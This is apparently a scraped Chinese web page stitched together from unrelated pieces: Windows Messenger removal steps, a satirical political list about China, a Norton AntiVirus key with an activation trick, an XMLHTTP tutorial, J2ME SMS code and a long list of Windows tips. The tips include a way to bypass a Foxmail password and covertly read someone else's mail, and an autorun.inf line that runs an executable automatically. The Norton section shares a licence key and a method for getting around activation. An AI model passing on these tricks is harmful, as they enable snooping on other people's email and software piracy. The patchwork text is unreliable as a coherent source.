方法1:

点击“开始”-“运行”,将如下命令RunDll32 advpack.dll,LaunchINFSection %windir%\\INF\\msmsgs.inf,BLC.Remove拷贝进去执行即可。

方法2(禁用):

同时还发现微软已经有了解决的方法:

如何禁止 Windows Messenger 在基于 Windows XP 的计算机上运行

基于 Windows XP Professional 的计算机上的 Windows Messenger 4.0 或更高版本
使用组策略 (gpedit.msc) 管理单元打开“不允许运行 Windows Messenger”选项。

注意:• 要使用组策略管理单元,必须使用具有管理员权限的帐户登录到计算机。
• 该方法可防止使用 Messenger API 的程序使用 Windows Messenger。使用这些 API 以及依赖 Windows Messenger 的一些程序有:Microsoft Outlook 2002、Microsoft Outlook Express 6 和 Windows XP 中的“远程协助”功能等。

要打开“不允许运行 Windows Messenger”选项,请按照下列步骤操作:

1. 单击“开始”,单击“运行”,键入 gpedit.msc,然后单击“确定”。
2. 在组策略中,依次展开“本地计算机策略”、“计算机配置”、“管理模板”、“Windows 组件”和“Windows Messenger”。
3. 双击“不允许运行 Windows Messenger”,然后单击“启用”。
4. 单击“确定”。
5. 在“文件”菜单上,单击“退出”以退出组策略管理单元。

基于 Windows XP Home Edition 的计算机上的 Windows Messenger 4.0
注意:该方法不禁止用户手动运行 Windows Messenger,但禁止 Windows Messenger 在每次启动 Windows 时自动运行。

更改 Windows Messenger 中的首选项。为此,请按照下列步骤操作。

1. 启动 Windows Messenger。
2. 在“工具”菜单上单击“选项”,然后单击“首选项”选项卡。
3. 单击以清除“在 Windows 启动时运行此程序”复选框,然后单击“确定”。
如果使用 Outlook Express 或 Outlook 2002,则 Windows Messenger 会在每次运行 Outlook Express 或 Outlook 时自动启动。要防止 Windows Messenger 自动启动,请按照下列步骤操作:

Outlook Express
1. 在“工具”菜单上单击“选项”,然后单击“常规”选项卡。
2. 单击以清除“自动登录到 Windows Messenger”复选框,然后单击“确定”。

Outlook 2002
1. 在“工具”菜单上单击“选项”,然后单击“其他”选项卡。
2. 单击以清除“启用 Microsoft Outlook‘即时消息传递’”复选框,然后单击“确定”。

基于 Windows XP Home Edition 或 Windows XP Professional 的计算机上的 Windows Messenger 4.5 或更高版本
警告:注册表编辑器使用不当可能导致严重问题,可能需要重新安装操作系统。Microsoft 不能保证您可以解决因注册表编辑器使用不当而导致的问题。使用注册表编辑器需要您自担风险。

注意:该方法可阻止使用 Messenger API 的程序使用 Windows Messenger。使用这些 API 以及依赖 Windows Messenger 的一些程序有:Outlook 2002、Outlook Express 6 和 Windows XP 中的“远程协助”功能等。

1. 启动注册表编辑器。为此,请单击“开始”,单击“运行”,键入 regedit.exe,然后单击“确定”。

如果以下注册表子项已经存在,则转至步骤 6:

HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Messenger\\Client
2. 单击以下注册表子项:
HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft
3. 在“编辑”菜单上,指向“新建”,然后单击“项”。键入 Messenger 作为新注册表项的名称,然后按 Enter 键。
4. 单击以下注册表子项:项:
HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Messenger
5. 在“编辑”菜单上,指向“新建”,然后单击“项”。键入 Client 作为新注册表项的名称,然后按 Enter 键。
6. 单击以下注册表子项:项:
HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Messenger\\Client
7. 在“编辑”菜单上,指向“新建”,然后单击“DWORD 值”。键入 PreventRun 作为新 DWORD 值的名称,然后按 Enter 键。
8. 右键单击在步骤 7 中创建的 PreventRun 值,然后单击“修改”。在“数值数据”框中,键入 1,然后单击“确定”。
9. 退出注册表编辑器。

写得不错,把深刻的东西写得很通俗易懂,便于老百姓流传!

1。该国百姓收入是欧美的几十分之一,房价却要赶超欧美;

2。该国房子可以是自己的,但土地永远是国家的!——物权法最近又补充了一下:" 房子是土地的一部分"

3。该国的国际长途,从国内打到国外的价格是国外打到国内价格的10倍以上!此谓支持民族工业———尊敬的"中国电信"

4。该国成天叫嚣"中华民族的伟大复兴""教育兴国""教育是根本"……,但政府教育经费投入之少与非洲穷国乌干达看齐,百姓自掏教育经费之多全球之冠!此谓社会主义优越性!

5。该国公务员的薪水不拿全国的平均水平,而是平均水平的3倍以上,此谓"高薪养廉"

6。该国全国公务员不交一分钱"养老金",而退休后的养老金是全国其他人民的3倍以上。邻国小犬蠢一狼3个月没缴"养老金",全国中央电视台作为丑闻天天放!此谓"三步笑百步"

1。出租私房要向派出所每月交费!——(类似黑社会的保护费?)

2。禁止收看外国的电视节目!—(比塔利班的禁止收看电视可能要仁慈一点)

3。在国内旅游也需要"签证"—(去香港需要过境签证,去深圳需要边防检查证)

4。反对执政党就要坐牢——(我看谁敢在大街上喊一句:打倒…)

6。上市公司搞诈骗,股民受损失,但国家法院不受理此类赔偿!——(因为无法可依)

7。禁止用自己买下的房子来作公司办公室——(上海市已经文规定,也就是说,你没有真正支配自己财产的权利)

8。去网吧上网要出示身份证。

9。黄色刊物属于非法,但性用品商店到处都是。

10。摩托车的行驶证(牌照)价格比摩托车本身高上好几倍。

11。在国外能够浏览的互联网内容在该国可能就无法浏览——(不是你的电脑故障)

12。电话打得越多越贵,没打电话也要你付钱——(托中国移动的福手机双向收费)

13。医疗事故其实是由医院来裁决的——(法院参照医院所属的上级部门的鉴定报告来判决)

14。赌博是非法的,但彩票满天飞,是合法的。

15。该国法官说的最多的一句话就是:"因还没有这方面的相关法律"

16。军队是属于某个政党的,不是国家的。

17。人民是不能直接参与投票选举领袖的。

18。一个国家可以有2种制度——(当然,也是被迫的,很不情愿的)

19。每个公司中都有一个叫作党支部书记的职位——(当然,它是不负责公司业务的)

20。该国中有个叫作"离休干部"的阶层,可以享受高于普通公民的待遇。

21。该国的领导人喜欢在公共场合卖弄蹩脚的英文。

22。新闻媒体是由某个政党投资的,但用的却是纳税人的钱——(新闻是我们党的喉舌——名言)

23。人民是不能随意改变居住地的——(户口制度)

24。该国的货币是不能在世界上流通的。

25。每对夫妇只允许生一个孩子。

26。该国的公民习惯于谎言,不愿意接受真相。

27。该国每100个政府官员中就有100个贪污犯——(当然,贪污数目大小有所不同啦)

28。党内行政警告处分可以用来代替刑事处分。

29。该国的兵役制度是强制性的

30"失业"在该国被称之为"下岗"

31。该国资源丰富,但却很多不能用——(因为都被污染了)

32。该国没有商业电视台,但电视广告却比国外台多好几倍。

33。让老百姓知道的越少越好,这是该国的"既定国策"

34。该国人口中有30以上的文盲或准文盲。

35。该国的法制中有"坦白从宽,抗拒从严"的政策——(不过最近几年好象没脸提了)

36。在该国,开一个小酒吧需要100道审批,开一个公司需要1000道审批。

37。该国是目前世界上唯一的社会主义国家,它的最终目标是实现共产主义——(是不是很伟大呀…哈)

38。该国家家都有大彩电,是不是很羡慕?不过那是用来接收党的指示的。

39。当地人会把非本地人称作为"外来盲流"

40。该国的执政党垄断很多产业,他们称之为"民族产业"——(电信,交通,媒体,水电煤,…)

41。在该国,你能很便宜地买到世界各地的名牌货——(不过都是假货…哈)

42。该国历史上曾经是鸦片的最大消费国,现在更是进化成为世界上最大的香烟消费国——(吸烟人口占总人口的比例世界第一)

43。很多外国公司把次品卖给该国,因为该国的产品比次品还次。

44。该国的公民好象个个都想消灭JP,但他们却经常拿自己的大半积蓄去买JP货哎。(这样何时才能消灭JP哟……哈)

45。该国的公民(大多数)认为爱国就是要爱执政党。

46。该国的公民(大多数)看了这封信只能无奈的笑笑。

Norton AntiVirus 2006 Key

Subscription Key: V39PRX4HCPHKWMKVTCGFD38Q3

先安装好软件,然后就会要求输入序列号,输入以上序列号,最重要一步了,
把最后一节的序列号先不要添,把(D3)换成任何的(字母+数字)然后就可以激活了。

开门见山,不离开页面就能刷新页面中的(部分)数据好处多多。主要是不需要写无聊代码维护 state。ASP.NET (以及其雏形 VI6 SOM)中的 server-side control (VI6 DTC, Script Library) 通过大量hidden input 来维护页面 state,其功力之深,非吾辈能及。所以我们要想办法不离开页面就能得到
新数据,这样生活会比较好过。

其实办法早就有很多。比如自己写 ActiveX Control 或 Java Applets,或使用系统自己带的。如果是 IE 浏览器,很久以前就可以使用 ADO RDS 之类的方法从 server 端远程获取数据。我们现在看看 XML 新石器时代的几种方法:

1. XMLHTTP
这种方法意思和 RDS 差不多,但在 XML 时代,这种方法显得比较正经儿。
网上有个比较好的例子:http://www.asptoday.com/articles/20001219.htm
Using Fat Clients For E-commerce 作者起这个名字 (Fat client) 就是说要求 browser 要支持 XMLHTTP。
代码片断:
Function getCategories()
Dim oXMLHTTP \‘ As Object
Dim oCategories \‘ As Object
Set oXMLHTTP = CreateObject(\"Microsoft.XMLHTTP\")
\‘— set the XMLHTTP call and issue send (no parm as category
\‘— is included in URL
oXMLHTTP.open \"GET\",SERVER_PATH & \"demo.asp?action=getcategories\",False
oXMLHTTP.send
\‘— load the response into the Categories data island
dsoCategories.loadXML oXMLHTTP.responseText
\‘— transform into HTML and assign to innerHTML property
divCategories.innerHTML = dsoCategories.documentElement.transformNode(dsoCategoriesXSL.documentElement)
\‘— tidy up the object
Set oXMLHTTP = Nothing
End Function

其实直接使用 DOMDocument.load 也是一样的。
参见 http://www.chinaasp.com/sqlbbs/showEssence.asp?id=3586
Zee 的帖子:“在IE里应用XML的一个小例子:解决双下拉选单的连动问题。”
代码片断:
var oXMLDoc = new ActiveXObject(\‘MSXML\‘);
sURL = \‘<%=strPathInfo%>XMLCity.asp?State=\‘ + sState;
oXMLDoc.url = sURL;

不显性地创建 ActiveXObject 也可以,变通的方法是使用 <XML ID=\"myData\">。

2. 如何支持 Netscape browser?
考虑到可以使用 XML SRC 的方式在页面中获得 XML data,我们可以仔细看一眼 HTML properties: SRC。可以注意到还有个常用 tag 具备这个 attribute — IFrame。所以我们可以使用下面的思路来从 server 获取数据,这回我们不使用 XML island, ActiveX Object,以便支持 NN。a. 在页面中加一个隐藏的 IFrame。b. 需要调用数据时,语句形如:IFrame.src \"http://localhost/getData?a=123\"
c. 为了迎合 NN 的胃口,我们的返回值不是直接 XML Data,而是 HTML,这样才能被 IFrame 接受d. 但最重要的是,这个 HTML Page 实际上是一个 well-formed 的 XML document。比如:
< HTML>
< BODY>
< P ID=\"P1\">abc</P>
< P ID=\"P2\">def</P>
< P ID=\"P3\">ghi</P>
< /BODY>
< /HTML>
e. 我们可以使用 client-side javascript 把这个 well-formed XML Doc 中的数据抓取出来,加入到我们的 select listbox 中。

(是在一个同事那里看到的这个思路,感觉他是剑术通神后,捻花摘叶皆是剑,何必拘泥于 XML DOM Object。)

挂一漏万,希望大家再加上几种方法。

  在程序中,发送短信息的方式一般有三种:

  1 使用程序在网络上发送短信息,例如各大网站的短信业务。这种方式是通过程序将信息发送给运营商的网关服务器,然后通过运营商的网络发送给手机。

  2 在计算机中,通过数据线连接到手机,然后通过手机来发送短信息。这种方式是通过使用AT指令来实现。爱立信手机的AT指令你可以在以下地址找到:http://mobilityworld.ericsson.com.cn/development/download_hit.asp

  3 通过在手机中运行的程序来发送短信息。这个正是本文实现的方式。

  在J2ME中,如果想发送短信息,需要使用WMA包,MIDP2.0中已经包含,MIDP1.0中可以通过厂商提供的扩展API实现,和WMA的类库基本一样。

  下面是使用WMA向指定手机号码发送短信息的一个方法,很简单。当然WMA也提供了其他的方式来发送更多的内容。

// SMSUtil.java
package my.util;
import javax.wireless.messaging.*;
import javax.microedition.io.*;
/**
*
发送文本短信息的方法
*/
public class SMSUtil
{
 /**
 * 给指定号码发送短信息
 * @param content 短信息内容
 * @param phoneNumber 手机号码
 * @return 发送成功返回true,否则返回false
 */
 public static boolean send(String content,String phoneNumber)
 {
  //返回值
  boolean result = true;
  try
  {
   //地址
   String address = "sms://+" + phoneNumber;
   //建立连接
   MessageConnection conn = (MessageConnection)Connector.open(address);
   //设置短信息类型为文本,短信息有文本和二进制两种类型
   TextMessage msg = (TextMessage)conn.newMessage(MessageConnection.TEXT_MESSAGE);
   //设置信息内容
   msg.setPayloadText(content);
   //发送
   conn.send(msg);
  }
  catch(Exception e)
  {
   result = false;
   //未处理
  }
  return result;
 }
}

本文收集了很多平时我们在使用windows中不为人知的技巧,通过这些技巧的了解,可以让你轻松的玩转windows,使你不再为一些小事而烦恼。  

  1、影音文件在xp中无法删除

  很多情况下是因为预览功能出了问题。开始 运行中输入并执行“REGSVR32 /U SHMEDIA.DLL”,取消息预览。

  恢复时运行“REGSVR32 SHMEDIA.DLL”

  其实就是去掉预览功能

  2、注册表解锁

  方法一:

  REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem] "DisableRegistryTools"=dword:00000000

  3、在xp下重装ie:

  运行 注册表编辑器,找到[HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{89820200-ECBD-11cf-8B85-00AA005B4383}],把键值从1改成0,重启后xp将自动开始安装 ie6

  4、永久不开启3721

  - Win9x/Me

  编辑文件 X:Windowshosts,添加一行代码:

  download.3721.com 255.255.255.255

  - WinNT/2000

  编辑文件 X:WINNTsystem32driversetchosts,添加一行代码:

  255.255.255.255 download.3721.com

  - WinXP

  编辑文件 X:Windowssystem32driversetchosts,添加一行代码:

  255.255.255.255 download.3721.com

  对于 CNNIC 的中文域名也可以用,域名改成 cdn2.cnnic.cn

  5、任务栏里的显示桌面丢失了怎么办?

  简单的方法::

  记事本新建输入:

  [Shell]

  Command=2

  IconFile=explorer.exe,3

  [Taskbar]

  Command=ToggleDesktop

  保存为 显示桌面.scf

  拖到快速启动

6、WIN98中用快捷方式实现一键关机

  每次关闭计算机,都需要执行“开始/关闭计算机”命令,给本来就很简单的关机操作带来了很多麻烦,下面介绍一种实现一键关机的方法。

  首先需要在桌面的空白处单击鼠标右键,并且新建立一个“快捷方式”,在弹出的创建快捷方式对话窗口中,在“命令行”中输入“C:windowsRUNDLL32.EXE user,ExitWindows”,然后单击“下一步”按钮,给该快捷方式命名为“一键关机”,这时系统的桌面上就会出现刚才建立的快捷方式了,打开该快捷方式的属性窗口,进入“快捷方式”页,并且给该快捷方式自定义一个快捷功能键,如F11,完成以后,就可以按F11键执行关机命令。  

  7、将MP3中音质不好的部分去除

  修正MP3歌曲可以通过mp3Trim软件来实现。  运行程序之后载入需要修正的MP3歌曲,首先要知道需要截取的是哪一部分,在“从头部”处输入截取部分的开始时间,单击右边的小喇叭按钮,同时在“从尾部” 处输入时间(这个时间是从文件末尾往前推的时间,所以此时间需用音乐总的时间减去刚才记下的时间来得到),单击右边的小喇叭按钮,紧接着选择保存便大功告成了。  除了从时间选择截取片段,mp3Trim支持从帧来选择截取片段,其操作方法与时间截取大同小异,而且其他诸如音量控制、淡入淡出效果等功能也很有特色。

  8、双击窗口左上角的图标可以关闭窗口

  如果同时有多个窗口打开,想要关闭的话,可以按住shift不放然后点击窗口右上角的关闭图标

  9、 输入法问题:

  1)、解决安装officexp输入法图标问题:  只要把 x:windowssystem(x为安装windows的盘符)文件夹下的ctfmon.exe在dos下删除或改名即可。(用该法操作后第一次启动电脑时,如发现输入法图标不再系统托盘中,可在控制面板的输入法图标 中把它找回来)

  2)、找回office2003的输入窗口:  在注册表中[HKEY_CURRENT_USER/Control Panel/Input Method/]下的Show Status值变为0,将其改为1。并重新登陆即可解决问题。  

  10、用记事本 减肥win2k

  进入c:winntinfsysoc.inf在编辑菜单中选替换,在查找中输入“hide,”点击全部替换,在添加删除中可出现一些常见的选项,你可根据自己的需要进行选择。  fc /purgecache  在运行里输入这个命令回车,可以清理很多缓存和一些备份文件,通常都能去掉300-400M的文件,对系统没有任何伤害,xp通用。

  11、用ghost压缩

  随便找一个gho镜像文件,用ghost explorer把文件中的内容删除。用ghost explorer打开空gho文件,并在ghost explorer的窗口里点右键粘贴或是直接把文件拖进窗口就行了。  (ghost explorer的压缩速度比winrar还要快,而添加、删除等都可以方便实现,用起来就象资源管理器一样)

  12、win2000/XP在遇到系统严重问题无法启动

  可以利用故防恢复控制台,把c:windowsrepair文件夹中保存的初始化注册表文件(system、software、 sam、security、default),复制进system32config(先将其同容备份后删除)中来换救系统 
  13、手动下载xp升级补丁

  许多朋友在装好sp1后通过windows update网上升级后还会发现有许多升级补丁,但是,如果通过windows update网上升级速度奇慢,有什么办法可以加速下载呢?通过实践,我发现一个小窍门。  

  步骤: 

  1):通过开始菜单里的windows update进行上网升级

  2):选择“扫描以寻找更新”查找升级补丁。  

  3):“复查并安装更新”开始查看更新补丁说明。 

  4):点击“立即安装”跳出windows update–网页对话框开始下载补丁 

  5):选择取消,退出升级 

  6):打开c:windowsWindows Update.log

  看见了吧!你所要得补丁下载地址都在这里!现在所要做的就是复制下载链接地址用网际快车(FlashGet)这类的下载软件进行下载。

14、利用fc和>来分析注册表

  例如,我们可以在安装软件前份一次注册表(如:c:first.reg),安装后再导出注册表文件(c:second.red)然后再在MS-DOS方式(纯DOS方式也行)下执行下列命令:  c:>fc first,reg second.reg>fc.txt (回车)  再打开fc,txt文件,即可查看该软件对注册表添加了哪些子项了。  注:重定向输入的文件类型一般为.txt形式也可以,如.wps 、.doc等,前提是必须安装相应的文件打开程序 

  15、轻松破解foxmail账户口令

  在foxmail中为了账户的安全,我们一般会为账户设置一个口令,如果忘了也不要紧。打开mail目录下以你的帐户命令的文件夹,删除accounf.stg。口令解除了。  不用删除,改个后缀名即可。系统会自动创建一个新的accounf.stg文件,出来后删除此文件,再改回原accounf.stg文件后缀,就能神不知鬼不觉看别人的邮件了。不过最好不要用于非法用途。  

  16、局域网隐身法: 

  在局域网中常通过网上邻居查看局域网中其他用户的在线情况,如果你不希望别的用户知道你是否在线,这时可以在win2000/xp下运行cmd然后再运行net config server /hidden:yes 回车后就隐身啦。如果要取消只要把yes 改成no17、用winrar合并mp3:

  把几首要合并的mp3文件选中,右键单击——添加到档案文件,压缩方式选择存储。然后把压缩好的文件后缀改成mp3。再放一下听听是不是两首歌已经合成一首啦。

  18、禁用设备驱动更新向导

  这个设置可以允许你在设备管理器中禁用通过windows Update升级设备的驱动程序。  要进行这个设置,可以按以下步骤进行操作:在任务栏上点击开始按钮,然后在开始菜单中点击运行,输入regedit并点击确定,打开注册表编辑器。展开HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindows NTDriver Signing  创建一个名为“NoDevMgrUpdate”的DWORD 键,然后设置键值为“1”。你修改的设置会在你重启动电脑后生效

  19、改变驱动签名验证选项

  这个设置可以让你决定在安装未经过签名或者测试的驱动程序时系统采取怎样的操作。要进行这个设置,可以按照以下步骤进行操作:在任务栏上点击开始按钮,然后在开始菜单中点击运行,输入regedit并点击确定,打开注册表编辑器。展开 HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindows NTDriver Signing 创建一个名为“BehaviorOnFailedVerify”的DWORD 键,设置键值为“0”。你修改的设置会在你重启动电脑后生效。

  20、卸载传真和图片查看器

  如果不想用XP自带的传真和图片查看器,你可以运行这个命令卸载它:  regsvr32 /u shimgvw.dll

  21、禁止officexp输入条

  先在添加/删除程序里把《中文可选输入方法》禁用,然后在区域设置详细信息将除“英语(美国)”之外的其它 输入法删除,最后运行

  regsvr32 /u msimtf.dll  regsvr32 /u msctf.dll

  22、豪杰超级解霸V8

  只要将安装目录中的VCvtShell.dll改名就可以去掉资源管理器中的按钮.

  23、系统是2K或xp,如果你的系统分区是fat32格式,如果非法关机,下次启动的时候系统会运行磁盘扫描程序,但是启动的时候总是会有10秒钟的等待时间,如何去掉呢? 

  只要一个命令即可:  CHKNTFS /t:0  上面的0是等待秒数。

  24、2k系统老是提示“无法装载动态链接库***.dll,系统找不到指定文件“把该文件copy到原路径也没用,这时你可以试试dos下的这个命令来修复系统文件:

  fc /scanonce  如果需要的话会提示插入2k光盘,然后重启就应该可

25、MyIE2里怎么改google搜索

  MYIE2>设置中心>快捷搜索>*是默认搜索,最新"简体"中文搜索是www.google.com/search?q=% … 2&lr=lang_zh-CN 

  26、不用重新启动都可以应用修改后的注册表

  修改注册表后,保存对注册表的修改。然后同时按下“Ctrl+Alt+Del”组合键,在弹出的Windows任务列表,加亮“Explore”,单击“结束任务”,显示关机屏幕,单击“否”,稍候,弹出错误信息,单击“结束任务”,Windows浏览器即会和新的注册表一起重新装载。

  27、QQ自己加自己的方法:

  在黑名单中加自己,然后再把自己拖到我的好友中就可 以了,然后再运行注册向导.

  28、启动Winamp,并播放一首MP3,然后按住[SHIFT]不放,再单击面板上的“停止”按钮 ,你会发现音乐没有立即停止,而是逐渐降低音量直至完全消失,就象电台DJ做的一样 

  29、原来硬盘图标也可以这么漂亮啊!

  首先你得在网上下载几个你喜欢的图标(后缀名为.ico),分别放入每个驱动器的根目录下面,命名为如1.ico 然后新建一记事本,输入  [autorun]  icon=1.ico  然后保存为autorun.inf就可以了,重启系统就能看到效果了!另外最好把这两个文件的属性设置为"隐藏"。

  主要是因为如果不这样做的话,你打开每个驱动器都可以看见这么两个文件,太丑了,而且也使我们把硬盘图标变漂亮的秘密给暴露了!

  而且这一招还可以应用到光盘上,在你刻录的光盘上也加入一个autorun.inf文件和一个图标,那么你的光盘也会有这样的一个图标!

  另外,把autorun.inf的内容改成:  [autorun]  open=xxx.exe  插入光盘时便会自动运行xxx.exe这个文件,这一招也很实用!

  30、 RealOne Player是一个非常优秀的音视频播放软件,美中不足的是启动时间比较长,那我们何不想点办法来加快RealOne Player的启动速度呢?

  1). 无声地启动

  执行“开始→搜索→文件或文件夹”命令,分别查找“netid.smi”和“getmedia.ini”文件,找到后将它们更名,比如更名为 “netid-old.smi”和“getmedia-old.ini”,此后当你再次启动RealOne Player时,就不会再有欢迎音乐,软件也不会再尝试连接软件主页了。

  2). 省略软件简介

  在“Tools→Album info”中选中“Hide”项,则以后RealOne Player就不再显示产品简介了。 关闭媒体浏览器  RealOne Player提供了一个媒体浏览器,关闭它的方法是:在RealOne Player窗口右上角“关闭”按钮的下面,“地球”按钮的右面,找到一个三角箭头,单击这个箭头打开其下拉菜单,取消“show media browser”项前的勾即可  再次启动RealOne Player,感觉速度是不是快了许多?

  31、 让中文文件名按笔画排序

  在Windows 的资源管理器中,不管文件(或文件夹)名是英文还是中文,当我们用“详细信息”方式查看时,在文件列表标题“名称”上单击,文件名默认的排序方式都是按字母的顺序排列的。  

  如果你有大量的中文文件名,那么让中文文件名按笔画排序会更符合我们的使用习惯。方法是:在Windows XP中双击“控制面板→区域和语言选项”,切换到“区域选项”选项卡,单击“自定义”按钮打开“自定义区域选项”对话框,单击“排序”选项卡。

在排序方法下拉列表中选择“笔画”。重新启动计算机后,打开资源管理器,单击文件列表标题“名称”,会发现中文文件名已经按笔画多少排序了!  注意:该设置只影响中文名称文件,不管以“发音”还是以“笔画”排序,用英文命名的文件,其排序方式总是按名称排序。

  32、 巧破网页禁用鼠标右键

  巧破网页禁用鼠标右键

  第一种情况,出现版权信息类的。破解方法如下:在页面目标上按下鼠标右键,弹出限制窗口,这时不要松开右键,将鼠标指针移到窗口的“确定”按钮上,同时按下左键。现在松开鼠标左键,限制窗口被关闭了,再将鼠标移到目标上松开鼠标右键,哈哈,弹出了鼠标右键菜单,限制取消了!

  第二种情况,出现“添加到收藏夹”的。破解方法如下: 在目标上点鼠标右键,出现添加到收藏夹的窗口,这时不要松开右键,也不要移动鼠标,而是使用键盘的TAB键,移动焦点到取消按钮上,按下空格键,这时窗口就消失了,松开右键后,我们熟悉的右键菜单又出现了。

  第三种情况,超链接无法用鼠标右键弹出“在新窗口中打开”菜单的。这时用上面的两种方法无法破解,看看我这一招:在超链接上点鼠标右键,弹出窗口,这时不要松开右键,按键盘上的空格键,窗口消失了,这时松开右键,可爱的右键菜单又出现了,选择其中的“在新窗口中打开”就可以了。

  上面的方法你全都知道?那再看下面的你知道不知道?在浏览器中点击“查看”菜单上的“源文件”命令,这样就可以看到html源代码了。不过如果网页使用了框架,你就只能看到框架页面的代码,此方法就不灵了,别急,我还有别的办法。你按键盘上的Shift+F10组合键试试,可以直接调出右键菜单!

  再看我这一招:看见键盘右Ctrl键左边的那个键了吗?按一下试试,右键菜单直接出现了!这一招在江湖上可是很少见到的,如何?还不行吗? 看来必须使出我的独门绝招了!

  要看仔细了,这可是江湖上从来没有出现过的“无敌****”哦!在屏蔽鼠标右键的页面中点右键,出现限制窗口,此时不要松开右键,用左手按键盘上的ALT+F4组合键,这时窗口就被我们关闭了,松开鼠标右键,菜单出现了!这一招一使出来,以上所有情况都可轻易破解掉。

  33、 键盘“Print Screen”键的妙用四则 

  1、代替屏幕截图软件  

  按下Print Screen键,将会截取全屏幕画面。用鼠标点击“开始→程序→附件→画图”,将会打开“画图”程序,点击该窗口中的“编辑→粘贴”菜单,这时会弹出一个 “剪贴板中的图像比位图大,是否扩大位图?”对话框,点击“是”,就会将该截取的图片粘贴到其中。再按下Ctrl+S键将图片保存即可。

  2、抓取当前活动窗口    

  在使用Print Screen进行屏幕抓图时,同时按下Alt键,就会只抓取当前活动窗口,然后按上述方法保存即可。

  3、截取游戏画面  

  我们都知道用键盘上的Print Screen键可以抓取系统中的桌面图案,然后在“画图”程序或是Photoshop之类的图像处理软件中可以“粘贴”出来。但是如果我们要抓的是游戏画面的话,上面这个方法可能就不灵光了。没关系,启动Windows Media Player(6.0以上版本),打开一个视频文件,选择“文件→属性→高级”,双击Video Renderer,在Direct Draw中,把YUV Flipping、RGB Flipping、YUV Overlaya和RGB Overlays四个选项取消,确定后退出。再试试看,用Print Screen键也可以抓游戏画面了。

  4、截取DirectX图  

  MPrint Screen键无法截取DirectX图,没关系,只要我们略施小计,就可以让它大展拳脚。在“开始”菜单的“运行”中输入regedit,打开 注册表编辑器,然后展开注册表到HKEY_Local_MachineSoftwareMicrosoftDirectDraw分支,新建一个“DWORD”值,并将其重命名为“EnablePrintScreen”,填入键值“1”,即可使Print Screen键具有截取DirectX图的功能。

35、快捷使用你的软件

  在桌面上找到你最常用的软件的图标,点右键-属性,将快捷方式选项更改为你认为最合适的,比如我的myie2是F9,winamp是F10,QQ是F11,再在myie外部工具栏里添加你上网常用的软件,这样我开机时只要按F9、F10、F11,我三个最常用的软件就很快打开了,但是最好不要将快捷键设置与系统常用的相同,一般设置时会提示的!

  36、用下载软件查看隐藏分区

  操作系统:WINDOWS XP 分区格式:FAT32 下载软件:网际快车、影音传送带、迅雷、BT精灵   

  隐藏分区软件:优化大师或是通过修改注册表,原理是一样的,具体的不再详细说明。

  本人是用优化大师的优化功能隐藏了h盘。 

  情况一:下载工具中有H盘软件或文件的下载记录。 比如曾经用上面的任何一个下载工具下载了QQ在H盘,记录未删除。此时选择这个记录,以快车为例,任务-打开下载的文件目录,你会发现隐藏的H盘被打开,里面的文件可以进行操作了!呵呵!

  情况二:下载工具中无隐藏分区的相关文件下载记录或无任何记录,而你怀疑或是知道隐藏了某个分区(比如我们现在知道我的电脑上隐藏了H盘),此时任意找到一个下载链接,以快车为例,用快车下载,保存在H盘任意一文件夹下,不一定要下载完毕,然后任务-打开下载的文件目录,H盘就被打开了,当然前提是确实隐藏了H盘。

  37、winxp自带批量重命名功能

  只要选中一堆文件,选重命名,然后改第一个文 件,改完后,其他文件也会自动修改。

  38、 改变win98录音机的录音长度限制

  1).打开录音机,安下“录音”按钮,这时在录音窗口右侧显示本次录音的长度为60秒,左侧显示本次录音的位置。

  2).待录音进行到一定的位置后,按下“停止”按钮。

  3).打开“效果”菜单,选择“减速”,这时你会发现录音窗口右面显示长度为100秒。不断重复操作,直到录音长度增加到合适长度。

  4).按“收索到开头”按钮,然后再按“录音”开始正式录音,这时候录音的长度就不是一分钟了!

  39、Word文档加密小技巧

  文件菜单设置:

  1、打开需要加密的Word文档。

  2、选“文件”的“另存为”,出现“另存为”对话框,在“工具”中选“常规选项”,出现“保存”选项卡。

  3、分别在“打开权限密码”和“修改权限密码”中输入密码(这两种密码可以相同也可以不同)。

  4、再次确认“打开权限密码”和“修改权限密码”。按“确定”退出“保存”选项卡。

  5、文件存盘。  

  由工具菜单设置:

  1、打开需要加密的Word文档。

  2、选“工具”菜单的“选项”命令,出现“选项对话框”。

  3、在“选项”对话框中选“保存”选项卡。

  4、分别在“打开权限密码”和“修改权限密码”中输入密码,点“确定”退出。

  5、将文件保存。 

  对模板加密  

  如果我们不想别人使用Word提供的通用模板(Narmal.dot)或自己精心创作的一个模板,可以对该模板进行加密,其方法是:

  1、打开通用模板文件(文件名是Narmal.dot,通常可以在C:\ProgramFiles\Mi-crosoft\Templetas文件夹中找到)。

  2、按上面的两种方法设置密码。

  3、点“工具栏”中的保存(或选“文件”菜单的“保存”)。以后每次启动Word时,就会提示你输入密码。  

  40、如何输入汉语拼音中的音调符号(如:ā、ě、ū、ǔ、ü、á等)

  方法一:word软件中,单击“插入”/“符号”在弹出的“符号”对话框的“子集”框中选择“拉丁语扩展-A”然后在中间的大框中选择想要的符号,单击对话框下面的“插入”,再单击“关闭”。

  方法二:在“智能ABC 输入法”中文输入状态,输入“V8”,然后在列表中选择即可。(顺便说一下,当在“智能ABC输入法”中文输入状态,输入“V”+“一个0-9的数字”,如“V1”、“V2”…,你会发现许多令人吃惊的玩意。

  41、 删除“运行”中的历史记录

  选择“开始”菜单中的“关闭系统”命令,然后在弹出的对话框中选择“否”返回Windows,再看看“运行”中的历史记录是不是都消除了呢?

  42、 让“我的电脑”高高在上

  默认情况下,在资源管理器中,Windows XP会把“我的文档”图标放在“我的电脑”图标上面。

  这种排列顺序让很多人在使用中感到很不适应。通过修改注册表,我们可以让“我的电脑”图标“跑”到“我的文档”图标之上,其操作方法是:  单击“开始→运行”,键入“Regedit”后回车,打开注册表编辑器,依次展开[HKEY_CLASSES_ROOTCLSID]分支,双击右侧窗口中名为“SortOrderIndex”的DWORD值,将它的值由“48”改为“54”即可。

  43、彻底删除“我的文档”

